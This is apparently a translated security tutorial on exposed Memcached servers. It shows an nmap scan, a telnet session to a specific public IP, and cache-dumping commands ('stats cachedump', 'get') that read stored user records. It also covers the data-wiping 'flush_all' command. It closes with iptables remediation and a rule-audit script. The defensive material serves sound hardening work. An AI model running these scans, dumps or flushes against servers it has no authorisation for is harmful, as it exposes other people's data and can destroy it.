Memcached Vulnerability Discovery and Exploitation

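Memcached is a high-performance distributed in-memory object caching system. By maintaining one large, unified hash table in memory, it can store data in many formats, including images, video, files, and the results of database queries. Put simply, data is loaded into memory and then read back from memory, which greatly speeds up reads.

Memcached is a Danga project, developed by Brad Fitzpatrick of LiveJournal. It was originally written to speed up access to LiveJournal and was later adopted by many large websites.

Memcached runs as a daemon on one or more servers and accepts client connections and operations at any time.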

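1. Vulnerability scanning

memcache listens on port 11211 by default, so nmap can be used to scan port 11211 on the servers:

nmap -n --open -p 11211 X.X.X.X/24

-n: skip reverse DNS resolution to speed up the scan

Example: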

MacPC:~ $ nmap -n --open -p 11211 114.215.126.245

Starting Nmap 6.47 ( https://nmap.org ) at 2015-07-14 21:40 CST
Nmap scan report for 114.215.126.245
Host is up (0.054s latency).
PORT      STATE SERVICE
11211/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

2. Connecting remotely with telnet

telnet X.X.X.X 11211

Example:

MacPC:~ liuxin$ telnet 14.215.126.245 11211
Trying 14.215.126.245...

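3. Memcached command operations

stats items # show the number of items in each slab

stats slabs # show information about each slab, including chunk size, chunk count, and usage

stats cachedump <slab_id> <limit_num> # list the first limit_num keys in a given slab

get <key> # fetch/inspect the value stored under a key

Example: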

MacPC:~ $ telnet 114.215.126.245 11211
Trying 114.215.126.245...
Connected to 114.215.126.245.
Escape character is '^]'.
stats items
STAT items:1:number 1
STAT items:1:age 129210
STAT items:3:number 28
STAT items:3:age 13850257
STAT items:4:number 42
STAT items:4:age 13859565
STAT items:7:number 4
STAT items:7:age 13766769
STAT items:11:number 1
STAT items:11:age 13754452
STAT items:13:number 24
STAT items:13:age 13859428
STAT items:14:number 10
STAT items:14:age 13850271
END


stats slabs
STAT 1:chunk_size 88
STAT 1:chunks_per_page 11915
STAT 1:total_pages 1
STAT 1:total_chunks 11915
STAT 1:used_chunks 11914
STAT 1:free_chunks 1
STAT 1:free_chunks_end 11913
STAT 3:chunk_size 140
STAT 3:chunks_per_page 7489
STAT 3:total_pages 1
STAT 3:total_chunks 7489
STAT 3:used_chunks 7483
STAT 3:free_chunks 6
STAT 3:free_chunks_end 7455
STAT 4:chunk_size 176
STAT 4:chunks_per_page 5957
STAT 4:total_pages 1
STAT 4:total_chunks 5957
STAT 4:used_chunks 5956
STAT 4:free_chunks 1
STAT 4:free_chunks_end 5914
STAT 7:chunk_size 348
STAT 7:chunks_per_page 3013
STAT 7:total_pages 1
STAT 7:total_chunks 3013
STAT 7:used_chunks 3013
STAT 7:free_chunks 0
STAT 7:free_chunks_end 3009
STAT 11:chunk_size 860
STAT 11:chunks_per_page 1219
STAT 11:total_pages 1
STAT 11:total_chunks 1219
STAT 11:used_chunks 1219
STAT 11:free_chunks 0
STAT 11:free_chunks_end 1218
STAT 12:chunk_size 1076
STAT 12:chunks_per_page 974
STAT 12:total_pages 1
STAT 12:total_chunks 974
STAT 12:used_chunks 973
STAT 12:free_chunks 1
STAT 12:free_chunks_end 973
STAT 13:chunk_size 1348
STAT 13:chunks_per_page 777
STAT 13:total_pages 1
STAT 13:total_chunks 777
STAT 13:used_chunks 776
STAT 13:free_chunks 1
STAT 13:free_chunks_end 752
STAT 14:chunk_size 1688
STAT 14:chunks_per_page 621
STAT 14:total_pages 1
STAT 14:total_chunks 621
STAT 14:used_chunks 617
STAT 14:free_chunks 4
STAT 14:free_chunks_end 607
STAT 15:chunk_size 2112
STAT 15:chunks_per_page 496
STAT 15:total_pages 1
STAT 15:total_chunks 496
STAT 15:used_chunks 493
STAT 15:free_chunks 3
STAT 15:free_chunks_end 493
STAT active_slabs 9
STAT total_malloced 9433496
END

stats cachedump 14 5
ITEM Sys_User_201502041350514808393AECA4340411122F [1344 b; 1422521236 s]
ITEM Sys_User_20150205191326670972139D8D42A48B4524 [1356 b; 1422521236 s]
ITEM Sys_User_20150205191749291793220B462B84B83D09 [1312 b; 1422521236 s]
ITEM Sys_User_20150203175420502279340C5AA4731864F4 [1280 b; 1422521236 s]
ITEM Sys_User_2015020516545371286957FE4C8098F0737B [1272 b; 1422521236 s]
END

get Sys_User_2015020516545371286957FE4C8098F0737B
VALUE Sys_User_2015020516545371286957FE4C8098F0737B 274 1272
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
END

This turned up what appears to be user information, although it is encrypted.

Other operations

stats\r\n # check the Memcache server status

stats
STAT pid 5264
STAT uptime 14361081
STAT time 1436882317
STAT version 1.2.4
STAT pointer_size 32
STAT curr_items 106
STAT total_items 31217
STAT bytes 54224
STAT curr_connections 2
STAT total_connections 17339
STAT connection_structures 61
STAT cmd_get 2101820
STAT cmd_set 31217
STAT get_hits 257409
STAT get_misses 1844411
STAT evictions 0
STAT bytes_read 49770310
STAT bytes_written 202786599
STAT limit_maxbytes 1073741824
STAT threads 1
END

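pid: process ID
uptime: total running time, in seconds
time: current time
version: version number
...
curr_items: number of key-value pairs currently in the cache
total_items: total number of key-value pairs that have ever been stored in the cache
bytes: amount of memory used by all cached data
curr_connections: current number of connections
...
cmd_get: total number of get requests
cmd_set: total number of set (write) requests
get_hits: total number of hits
get_misses: number of failed gets (misses)
...
bytes_read: total bytes read
bytes_written: total bytes written
limit_maxbytes: maximum amount of memory allowed, in bytes

flush_all # clear all key-value pairs

Note: flush does not delete the items; it only marks all of them as expired, so memcache still holds all of its memory afterwards.

quit\r\n # exit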


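Remediation ---> restrict the IPs allowed to connect

Use iptables to restrict the source IP so that only the host with IP X.X.X.X can reach memcached:

iptables -F # flush all existing rules
iptables -P INPUT DROP # default policy: drop inbound traffic that no rule accepts

iptables -A INPUT -p tcp -s X.X.X.X --dport 11211 -j ACCEPT

iptables -A INPUT -p udp -s X.X.X.X --dport 11211 -j ACCEPT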
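
One way to confirm the rules above took effect, as an added example that is not part of the original post: a first-match evaluator for the INPUT chain that reads `iptables-save -t filter` output and reports whether port 11211 is open to anyone other than the allowed host. The rule sets are constructed samples, 192.0.2.10 (standing in for X.X.X.X) and 203.0.113.7 are documentation addresses, and the sketch understands only `-s`, `-p`, `-m`, `--dport` and `-j`, raising on anything else.

```python
import ipaddress
import shlex

# Constructed `iptables-save -t filter` output; 192.0.2.10 stands in for X.X.X.X.
FIXED = """*filter
:INPUT DROP [0:0]
-A INPUT -s 192.0.2.10/32 -p tcp -m tcp --dport 11211 -j ACCEPT
-A INPUT -s 192.0.2.10/32 -p udp -m udp --dport 11211 -j ACCEPT
COMMIT
"""
NO_POLICY = FIXED.replace(":INPUT DROP", ":INPUT ACCEPT")       # -P INPUT DROP forgotten
NO_SOURCE = FIXED.replace("-s 192.0.2.10/32 -p udp", "-p udp")  # UDP rule lacks -s
KNOWN = {"-A", "-s", "-p", "-m", "--dport", "-j"}               # options handled here

def verdict(ruleset, src, proto, dport=11211):
    """First-match decision of the filter INPUT chain for one inbound packet."""
    addr, policy = ipaddress.ip_address(src), "ACCEPT"
    for line in ruleset.splitlines():
        if line.startswith(":INPUT "):
            policy = line.split()[1]              # chain default, e.g. DROP
        if not line.startswith("-A INPUT "):
            continue
        tok = shlex.split(line)
        opt = dict(zip(tok[0::2], tok[1::2]))     # each handled option takes one value
        if set(opt) - KNOWN or opt.get("-j") not in ("ACCEPT", "DROP", "REJECT"):
            raise ValueError("unsupported rule: " + line)
        if opt.get("-p", proto) not in (proto, "all"):
            continue
        if "-s" in opt and addr not in ipaddress.ip_network(opt["-s"], strict=False):
            continue
        if "--dport" in opt:
            lo, _, hi = opt["--dport"].partition(":")  # single port or lo:hi range
            if not int(lo) <= dport <= int(hi or lo):
                continue
        return opt["-j"]                          # first matching rule decides
    return policy                                 # nothing matched: chain policy

def audit(ruleset, allowed, outsider="203.0.113.7"):
    """Spot check: the allowed host must get in, a probe outsider must not."""
    problems = []
    for proto in ("tcp", "udp"):
        if verdict(ruleset, allowed, proto) != "ACCEPT":
            problems.append(f"{proto}/11211 blocked for {allowed}")
        if verdict(ruleset, outsider, proto) == "ACCEPT":
            problems.append(f"{proto}/11211 open to {outsider}")
    return problems
```

An empty list from `audit` means the probe found nothing wrong; it tests one outside address per protocol, so it is a spot check rather than a proof for every source.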
